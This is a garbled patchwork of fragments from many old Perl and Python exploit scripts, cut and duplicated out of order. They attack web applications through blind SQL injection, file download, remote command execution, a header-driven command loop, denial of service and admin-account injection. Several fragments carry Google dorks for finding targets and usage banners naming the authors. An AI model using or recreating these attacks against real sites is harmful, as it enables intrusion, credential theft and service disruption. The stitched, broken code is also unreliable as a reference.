print
$request->header(cookie => $cookie);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[**] Clan Tiger CMS - BLIND SQL Injection Exploit\n";
print "\t[??] USAGE MODE: [??]\n";
print "\t[**] perl $0 [HOST] [PATH] [uid] [code] [slug] [id] [DB_PREFIX]\n";
print "\t[**] [HOST]: Web attacked.\n";
print "\t[**] [PATH]: Home Path.\n";
print "\t[**] [uid]: The CCC_UID cookie.\n";
my $request = HTTP::Request -> new(GET => $_[0]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[###] TemaTres CMS v1.0.3 - (BLIND SQL Injection) Exploit\n";
print "\t[###] USAGE MODE: [###]\n";
print "\t[###] perl $0 [HOST] [PATH] [DBPREFIX] [Id]\n";
print "\t[###] [HOST]: Web.\n";
print "\t[###] [PATH]: Home Path.\n";
print "\t[###] [DBPREFIX]: Database Prefix. Default: lc_ (**optional)\n";
#
# ...
#
# if (eregi(" AND | NOT | OR ",$search,$matches)) $search=str_replace($matches,'',$search); <-------BYPASSED (/**/)
#
# $keywords = explode(' ', $search); //print_r($keywords); <---------BYPASSED (/**/)
#
# ...
#
# $query = "SELECT * FROM ".db('prefix')."content WHERE published='1' AND"; <----------START QUERY
#
$request->header(cookie => $_[0]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[XxX] WysGui CMS 1.2 BETA - BLIND SQL Injection Exploit\n";
print "\t[XxX] USAGE MODE: [XxX]\n";
print "\t[XxX] perl $0 [HOST] [PATH] [id]\n";
print "\t[XxX] [HOST]: Web.\n";
print "\t[XxX] [PATH]: Home Path.\n";
print "\t[XxX] [id]: Id user. Default: 1 (**optional)\n";
os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
os.system ("color 02")
else:
os.system("clear")
print "\t#######################################################\n\n"
print "\t#######################################################\n\n"
print "\t## AlumniServer v-1.0.1 Blind SQLi Exploit ##\n\n"
print "\t## ++Conditions: magic_quotes=OFF ##\n\n"
print "\t## ++Needed: Valid mail ##\n\n"
print "\t## Author: Y3nh4ck3r ##\n\n"
$request->content($_[1]);
}else{
$request = HTTP::Request -> new(GET => $_[0]);
}
my $outcode= $userag->request($request)->as_string;
#print $outcode; #--> Active this line for debugger mode
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
print "\t--->Maybe:\n\n";
print "\t\t1.-Patched or magic_quotes_gpc=ON.\n";
print "\t\t2.-User doesn't exist.\n";
print "\t\t3.-Error in captcha code or image.\n";
$request = HTTP::Request -> new(POST => $_[0]);
$request->referer($_[0]);
$request->content_type('application/x-www-form-urlencoded');
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
#print $outcode; #--> Active this line for debugger mode
#print $request->as_string; #--> Active this line for debugger mode
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
os.system("cls")
os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit")
os.system ("color 02")
else:
os.system("clear")
print "\t#######################################################\n\n"
print "\t#######################################################\n\n"
print "\t## FretsWeb 1.2 Blind SQL Injection Exploit ##\n\n"
print "\t## ++Conditions: magic_quotes=OFF ##\n\n"
print "\t## ++Needed: Valid name ##\n\n"
print "\t## Author: Y3nh4ck3r ##\n\n"
sub request {
    # Send a single HTTP GET to the URL given as the first argument and
    # return the complete response (status line, headers and body) as one
    # string.
    #
    # The User-Agent is a fixed MSIE 7.0 / Windows NT 5.1 string, so every
    # request made through this helper carries that exact value in the
    # receiving server's access log.
    my $client = LWP::UserAgent->new;
    $client->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

    # NOTE(review): $request is assigned without `my` in this sub, so it
    # refers to a variable declared elsewhere (or a package global) -- confirm
    # against the rest of the file before enabling `use strict`.
    $request = HTTP::Request->new(GET => $_[0]);

    my $response = $client->request($request);
    my $dump     = $response->as_string;
    # print $dump;    # uncomment to trace the raw response while debugging
    return $dump;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
$request = HTTP::Request -> new(POST => $_[0]);
$request->referer($_[0]);
$request->content_type('application/x-www-form-urlencoded');
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
#print $outcode; #--> Active this line for debugger mode
#print $request->as_string; #--> Active this line for debugger mode
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
os.system("cls")
os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit")
os.system ("color 02")
else:
os.sytem("clear")
print "\t#######################################################\n\n"
print "\t#######################################################\n\n"
print "\t## FretsWeb 1.2 Blind SQL Injection Exploit ##\n\n"
print "\t## ++Conditions: magic_quotes=OFF ##\n\n"
print "\t## ++Needed: Valid name ##\n\n"
print "\t## Author: Y3nh4ck3r ##\n\n"
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[!-!] Family Connections <= v1.9 (GET var 'member') BLIND SQLi Exploit\n";
print "\t[!-!] USAGE MODE: [!-!]\n";
print "\t[!-!] perl $0 [HOST] [PATH] [your-user] [your-pass] [your-id]\n";
print "\t[!-!] [HOST]: Web.\n";
print "\t[!-!] [PATH]: Home Path. Not use path= no-path\n";
print "\t[!-!] [your-user]: Your username.\n";
Use your brain, do not lame. Enjoy. =)
'''
#Python exploit starts:
import sys, httplib, urllib
print ""
if len(sys.argv)<=1:
print "################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
#-->RELEASED: 2009-01-25
#
#CMS VULNERABILITY:
#
#-->TESTED ON: firefox 3
#-->DORK: inurl:"printable_pedigree.php"
#-->CATEGORY: BLIND SQL INJECTION EXPLOIT
#-->AFFECT VERSION: <= 1.0.1 Beta
#-->Discovered Bug date: 2009-05-08
#-->Reported Bug date: 2009-05-08
#-->Fixed bug date: 2009-05-12
}
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
print "\t--->Maybe:\n\n";
print "\t\t1.-Patched.\n";
print "\t\t2.-Bad path or host.\n";
print "\t\tEXPLOIT FAILED!\n";
> }
> my $outcode= $userag->request($request)->as_string;
> return $outcode;
> }
> sub error {
> print "\t------------------------------------------------------------\n";
> print "\tWeb isn't vulnerable!\n\n";
> print "\t--->Maybe:\n\n";
> print "\t\t1.-Patched.\n";
> print "\t\t2.-Bad path or host.\n";
> print "\t\tEXPLOIT FAILED!\n";
> }
> my $outcode= $userag->request($request)->as_string;
> return $outcode;
> }
> sub error {
> print "\t------------------------------------------------------------\n";
> print "\tWeb isn't vulnerable!\n\n";
> print "\t--->Maybe:\n\n";
> print "\t\t1.-Patched.\n";
> print "\t\t2.-Bad path or host.\n";
> print "\t\tEXPLOIT FAILED!\n";
$target=@t[0];
if(index($target,"/",length($target)-1)==-1){
$target=$target.'/';
}
if($e!=1){
print "\nExample:\n";
print "\nbrooks@TheLab:~/code/exploits\$ ./smf_blind_sql.pl -p -u admin -t http://127.0.0.1/smf_1-1-3/index.php -n 4 -c SMFCookie218=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A40%3A%22091feddbd31bfa96932a5e4e6c34cb36f2686c1a%22%3Bi%3A2%3Bi%3A1378168836%3Bi%3A3%3Bi%3A1%3B%7D
\n\nSMF Is Vulnerable!
Finding Password Hash for the Name: 'admin'
Please Standby...
while( $this->cmd_prompt() )
{
$this->web->addheader('My-Code', $this->cmd);
$this->web->get($this->p_url);
print "\n".$this->get_answer();
}
exit(0);
}
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[XxX] microTopic v1 Initial Release (POST var 'rating') BLIND SQL Injection Exploit\n";
print "\t[XxX] USAGE MODE: [XxX]\n";
print "\t[XxX] perl $0 [HOST] [PATH] [topic]\n";
print "\t[XxX] [HOST]: Web.\n";
print "\t[XxX] [PATH]: Home Path. Not path: no-path\n";
print "\t[XxX] [topic]: Valid topic. Opt: 1,2,3,4\n";
my $request = HTTP::Request -> new(GET => $_[0]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub helper {
print "\n\t[XxX] RTWebalbum v1.0.462 (GET var 'AlbumID') BLIND SQL Injection Exploit\n";
print "\t[XxX] USAGE MODE: [XxX]\n";
print "\t[XxX] perl $0 [HOST] [PATH] [AlbumID]\n";
print "\t[XxX] [HOST]: Web.\n";
print "\t[XxX] [PATH]: Home Path. Not path: no-path\n";
print "\t[XxX] [AlbumID]: Valid AlbumID.\n";
#CuteNews 2.6 ( module file.php )
#Gr33tz-TeaM
#Dork : inurl:/cutenews/file.php
use LWP::UserAgent;
if(@ARGV!=2){
print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
print "-=-=-= Gr33tz To : -=-=-=-=-\n";
print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10);
binmode $server;
print "Waiting for connections on port 5050 TCP...\n";
while (my $browser = $server->accept()) { #When a connection occure...
binmode $browser;
my $method="";
my $content_length = 0;
#!/usr/bin/perl
#Found by Pr0metheuS
#Coded by Pr0metheuS
#Gr33tz-Team
#Dork : intitle:"CCMS v3.1 Demo PW"
print "______________________________________\n";
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n";
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n";
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n";
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n";
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n";
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
#Python exploit starts:
#Version 2 of this exploit. Not the one published on some sites.
import sys, httplib, urllib
print "\n################################################"
print " VigileCMS <= 1.8 Stealth "
print " Remote Command Execution "
print " "
print " Discovered By The:Paradox "
print " "
use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";
print "+ Company [Xc0re Security Research Group] +\n";
print "+ DATE: [25/10/09] +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
#!/usr/bin/python
import socket
import sys
def Usage():
    """Print the command-line synopsis followed by one example invocation.

    Each message ends with an explicit newline in addition to the one
    print adds, so the two lines are separated by a blank line.
    """
    messages = (
        "Usage: ./expl.py <serv_ip> <Username> <password>\n",
        "Example:./expl.py 192.168.48.183 anonymous anonymous\n",
    )
    for message in messages:
        print (message)
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
use LWP::UserAgent;
use Getopt::Long;
no warnings;
if(!$ARGV[1]) {
print "\n |--------------------------------------------------|";
print "\n | Indonesian Newhack Technology |";
print "\n |--------------------------------------------------|";
print "\n | AuraCMS <= 2.2.1 (user.php) |";
print "\n | 1.Security Code Bypass |";
print "\n | 2.Add Administrator |";